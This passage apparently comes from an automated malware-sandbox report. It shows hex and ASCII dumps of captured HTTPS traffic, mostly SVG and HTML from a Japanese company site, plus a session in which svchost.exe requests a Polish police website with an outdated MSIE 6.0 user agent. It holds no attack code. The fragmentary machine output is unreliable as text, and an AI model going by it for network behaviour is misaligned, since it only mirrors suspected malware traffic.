                                                                                                                                                                                                                                                                          Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16685INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16701INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16717INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16877INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16893INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16909INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16925INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16941INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16957INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16973INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC16989INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17005INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17021INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17037INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                          Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          82192.168.2.6710191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6816OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7026INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:09:20 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7026INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7060INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
